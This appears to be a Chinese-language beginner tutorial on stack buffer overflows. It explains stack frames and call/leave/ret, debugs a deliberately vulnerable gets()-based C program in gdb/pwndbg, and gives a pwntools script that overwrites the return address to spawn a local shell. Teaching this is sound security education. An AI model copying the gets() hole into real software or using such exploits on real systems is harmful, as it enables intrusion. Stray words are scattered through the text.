說明
本文主要講解簡單棧溢出的基本原理, 若是有什麼不對的地方或者更好的建議, 還請大佬指正.python
工具準備
- linux系統
- 調試工具gdb
- gdb插件:pwndbg
- pwntools工具包
關於pwndbg插件和pwntools能夠在github搜索並下載安裝,須要python環境
函數棧幀與ESP、EBP寄存器
C語言中,每一個棧幀對應一個未運行完的函數. 棧幀中保存了函數的局部變量和返回地址, 即保存着函數的執行環境.
------摘自百度百科
linux
ESP寄存器保存着棧幀的棧頂地址, EBP寄存器保存着當前函數棧幀的棧底地址. (32位系統爲ESP、EBP, 64位系統爲RSP、RBP, 其它寄存器同理)git
call指令、leave指令與ret指令
彙編語言中, 用call指令來實現函數的調用, 指令格式: call address;
call指令效果至關於"push eip; jump address;". 不只是跳轉到指定函數地址執行指令, 在跳轉以前還將當前IP寄存器中的值(下一條指令的地址)壓入到了棧中. 從而能夠在被調函數執行完以後, 繼續執行當前函數.
在被調函數執行完畢後, 程序要準備退出函數, 須要leave指令來釋放函數棧幀, 並使EBP寄存器恢復舊值, 執行的操做至關於"mov esp,ebp; pop ebp; 「, 以後ret指令將程序執行流返回上層函數. 有點c語言中return語句的意味. ret指令效果至關於"pop eip;」. 即將棧頂保存的值出棧, 做爲下一條將要執行指令的地址賦值給IP寄存器.
github
形成棧溢出的緣由
系統棧是由高地址往低地址增加的, 而數據的寫入是按低地址到高地址的順序寫入. 若是程序沒有對輸入的字符數量作出限制, 就存在數據溢出當前棧幀以及覆蓋返回地址的可能, 從而實現控制程序的執行流.shell
溢出原理
以32位可執行程序爲例, 咱們將經過調試分析下面這段簡單的代碼來理解棧溢出.bash
#include<stdio.h> #include<unistd.h> void shell(){ system("/bin/sh"); } void vulnerable(){ char buf[16]; gets(buf); } int main(){ vulnerable(); }
能夠看到buf大小隻有16字節,而gets()函數卻能夠無限輸入,不檢查字符上限, 直到遇到’\n’字符爲止.
咱們將c文件編譯連接成可執行文件:
函數
# 編譯參數先不講解,在後面講解保護機制時解釋 # 只需知道-m32是將.c文件編譯成32位程序便可 gcc -m32 -fno-stack-protector -no-pie main.c -o stack
咱們用objdump 來反彙編一下生成的可執行文件(部分反彙編代碼):工具
08049172 <shell>: 8049172: 55 push ebp 8049173: 89 e5 mov ebp,esp 8049175: 83 ec 08 sub esp,0x8 8049178: 83 ec 0c sub esp,0xc 804917b: 68 08 a0 04 08 push 0x804a008 8049180: e8 bb fe ff ff call 8049040 <system@plt> 8049185: 83 c4 10 add esp,0x10 8049188: 90 nop 8049189: c9 leave 804918a: c3 ret 0804918b <vulnerable>: 804918b: 55 push ebp 804918c: 89 e5 mov ebp,esp 804918e: 83 ec 18 sub esp,0x18 8049191: 83 ec 0c sub esp,0xc 8049194: 8d 45 e8 lea eax,[ebp-0x18] 8049197: 50 push eax 8049198: e8 93 fe ff ff call 8049030 <gets@plt> 804919d: 83 c4 10 add esp,0x10 80491a0: 90 nop 80491a1: c9 leave 80491a2: c3 ret 080491a3 <main>: 80491a3: 55 push ebp 80491a4: 89 e5 mov ebp,esp 80491a6: 83 e4 f0 and esp,0xfffffff0 80491a9: e8 dd ff ff ff call 804918b <vulnerable> 80491ae: b8 00 00 00 00 mov eax,0x0 80491b3: c9 leave 80491b4: c3 ret 80491b5: 66 90 xchg ax,ax 80491b7: 66 90 xchg ax,ax 80491b9: 66 90 xchg ax,ax 80491bb: 66 90 xchg ax,ax 80491bd: 66 90 xchg ax,ax 80491bf: 90 nop
上圖能夠看到, 在執行call以前,系統會將參數入棧(32位程序如此), 執行call指令進入函數以後, 前兩條彙編指令都相同:spa
55 push ebp 89 e5 mov ebp,esp
這兩條指令的做用是將上層函數棧幀的棧底入棧,同時將棧頂做爲本函數棧幀的棧底.
函數調用時棧的變化狀況大體以下所示:
執行call指令時首先esp執行-4操做, 棧頂上移, 而後將call指令的下條指令地址存入棧頂位置, 從上圖彙編代碼能夠看出是將地址0x80491ae入棧, 棧向低地址方向增加.
進入vulnerable函數以後,分別執行前兩條指令構造新棧幀:
將當前棧幀的ebp入棧, 而後將ebp移動到棧頂位置, 此時vulnerable函數的棧幀構造完畢,當有臨時變量時, esp指針執行sub操做,指針上移, 爲臨時變量開闢棧空間.
函數功能執行完畢,準備返回時, 須要將棧空間釋放, 即銷燬當前棧幀, 在上面彙編代碼部分能夠看到, 用戶定義的函數末尾一般會有兩條指令(有時候沒有leave指令):
插件
c9 leave c3 ret
執行leave指令, 首先將esp移動到棧幀的棧底ebp的位置, 以後執行出棧操做, 將棧頂賦值給ebp, 此時ebp恢復舊值, 由於出棧操做, esp指針下移. (出棧操做並不會清除棧內數據, 只是將esp的值修改了而已)
以後執行ret指令, 將棧頂賦值給IP寄存器 , esp下移, 程序繼續. 所謂棧溢出就是想辦法將上層函數的棧幀中的"返回地址"給覆蓋掉, 以達到改變程序執行流的效果. 在本例中, 就是往buf中一直寫入數據, 直到將main棧幀中"返回地址"給覆蓋掉. 當程序執行完vulnerable函數後, 將返回到指定地址繼續執行指令.
接下來咱們用動態調試工具gdb和pwndbg來調試此程序:
經常使用的gdb/pwndbg命令以下:
- b function_name —> 在函數處下斷點
- b *address —> 在地址address處下斷點
- info b —> 查看斷點信息
- r —> 運行程序
- n —> 單步步過
- s —> 單步步入,函數跟蹤
- c —> 繼續執行
- fin —> 跳出,執行到函數返回處
- stack n —> 查看棧內n個存儲單元的數據
運行gdb, 並在main函數處打上斷點, 運行程序:
能夠看到最上面是一些寄存器的狀態, 往下是程序執行處的反彙編代碼, 小箭頭指向將要執行指令, 接着是部分棧空間的狀態, 包括ebp和esp的位置信息, 最下面是函數調用順序, 能夠看到程序執行時, main函數並非第一個被調用的函數, 是由__libc_start_main調用.
Breakpoint 1, 0x080491a6 in main () LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ─────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────── EAX 0xf7fa7dc8 (environ) —▸ 0xffffbcbc —▸ 0xffffbe9f ◂— 'SHELL=/bin/bash' EBX 0x0 ECX 0xcaf93e6a EDX 0xffffbc44 ◂— 0x0 EDI 0xf7fa6000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1d9d6c ESI 0xf7fa6000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1d9d6c EBP 0xffffbc18 ◂— 0x0 ESP 0xffffbc18 ◂— 0x0 EIP 0x80491a6 (main+3) ◂— 0xe8f0e483 ───────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────── ► 0x80491a6 <main+3> and esp, 0xfffffff0 0x80491a9 <main+6> call vulnerable <vulnerable> 0x80491ae <main+11> mov eax, 0 0x80491b3 <main+16> leave 0x80491b4 <main+17> ret 0x80491b5 nop 0x80491b7 nop 0x80491b9 nop 0x80491bb nop 0x80491bd nop 0x80491bf nop ───────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────── 00:0000│ ebp esp 0xffffbc18 ◂— 0x0 01:0004│ 0xffffbc1c —▸ 0xf7de6b41 (__libc_start_main+241) ◂— add esp, 0x10 02:0008│ 0xffffbc20 ◂— 0x1 03:000c│ 0xffffbc24 —▸ 0xffffbcb4 —▸ 0xffffbe74 ◂— '/home/darkfox/Desktop/code_project/c/stack' 04:0010│ 0xffffbc28 —▸ 0xffffbcbc —▸ 0xffffbe9f ◂— 'SHELL=/bin/bash' 05:0014│ 0xffffbc2c —▸ 0xffffbc44 ◂— 0x0 06:0018│ 0xffffbc30 ◂— 0x1 07:001c│ 0xffffbc34 ◂— 0x0 ─────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────── ► f 0 80491a6 main+3 f 1 f7de6b41 __libc_start_main+241 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg>
咱們接着執行, 直到往buf輸入數據爲止:
0x804918c <vulnerable+1> mov ebp, esp 0x804918e <vulnerable+3> sub esp, 0x18 0x8049191 <vulnerable+6> sub esp, 0xc 0x8049194 <vulnerable+9> lea eax, [ebp - 0x18] 0x8049197 <vulnerable+12> push eax ► 0x8049198 <vulnerable+13> call gets@plt <gets@plt> arg[0]: 0xffffbbf0 ◂— 0x1 arg[1]: 0x40000 arg[2]: 0x7 arg[3]: 0x8049203 (__libc_csu_init+67) ◂— 0x8301c783 0x804919d <vulnerable+18> add esp, 0x10 0x80491a0 <vulnerable+21> nop 0x80491a1 <vulnerable+22> leave 0x80491a2 <vulnerable+23> ret 0x80491a3 <main> push ebp
咱們輸入’aaaa’, 並查看棧數據, 能夠看到咱們輸入的數據存儲在地址0xffffbbf0處, 咱們須要覆蓋的數據在地址0xffffbc0c處, 中間相隔了0x1c字節的數據. 另外咱們須要程序返回shell函數處, 運行shell函數, 得到系統控制權, 此時咱們能夠將shell函數的地址0x8049172覆蓋原來的地址數據.而後就大功告成.
──────────────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> stack 20 00:0000│ esp 0xffffbbe0 —▸ 0xffffbbf0 ◂— 'aaaa' 01:0004│ 0xffffbbe4 ◂— 0x40000 02:0008│ 0xffffbbe8 ◂— 0x7 03:000c│ 0xffffbbec —▸ 0x8049203 (__libc_csu_init+67) ◂— 0x8301c783 04:0010│ eax 0xffffbbf0 ◂— 'aaaa' 05:0014│ 0xffffbbf4 —▸ 0xffffbc00 —▸ 0xf7fe4520 (_dl_fini) ◂— push ebp 06:0018│ 0xffffbbf8 —▸ 0xffffbcbc —▸ 0xffffbe9f ◂— 'SHELL=/bin/bash' 07:001c│ 0xffffbbfc —▸ 0x80491db (__libc_csu_init+27) ◂— 0xff10b38d 08:0020│ 0xffffbc00 —▸ 0xf7fe4520 (_dl_fini) ◂— push ebp 09:0024│ 0xffffbc04 ◂— 0x0 0a:0028│ ebp 0xffffbc08 —▸ 0xffffbc18 ◂— 0x0 0b:002c│ 0xffffbc0c —▸ 0x80491ae (main+11) ◂— 0xb8 0c:0030│ 0xffffbc10 —▸ 0xf7fa6000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1d9d6c ... ↓ 0e:0038│ 0xffffbc18 ◂— 0x0 0f:003c│ 0xffffbc1c —▸ 0xf7de6b41 (__libc_start_main+241) ◂— add esp, 0x10 10:0040│ 0xffffbc20 ◂— 0x1 11:0044│ 0xffffbc24 —▸ 0xffffbcb4 —▸ 0xffffbe74 ◂— '/home/darkfox/Desktop/code_project/c/stack' 12:0048│ 0xffffbc28 —▸ 0xffffbcbc —▸ 0xffffbe9f ◂— 'SHELL=/bin/bash' 13:004c│ 0xffffbc2c —▸ 0xffffbc44 ◂— 0x0
用python編寫漏洞利用腳本
#!/usr/bin/python3 #指明腳本解釋程序 # 導入pwntools工具 from pwn import * # 運行stack程序 io = process('./stack') # shell函數返回地址 shell = 0x8049172 # 構造payload,先填充0x1c字節的垃圾數據,再覆蓋返回地址 # pack()將整型數值打包成32位字節碼,也可用 p32(shell) 代替 payload = b'a' * 0x1c + pack(shell,32) #若是是python2, payload構造方式以下 #payload = 'a' * 0x1c + p32(shell) # 向程序發送數據 io.sendline(payload) #交互模式 io.interactive()
運行腳本後得到系統控制權限,執行ls命令,果真能夠查看當前目錄的文件
darkfox@darkfox-PC:~/Desktop/code_project/c$ python3 io.py [+] Starting local process './stack': pid 15404 [*] Switching to interactive mode $ ls how2heap io.py main.c stack $
那真對這種簡單的棧溢出, 有什麼防止的辦法呢? 請查閱棧保護措施 canary機制、棧不可執行(NX)、地址隨機化(PIE、ASLR)機制。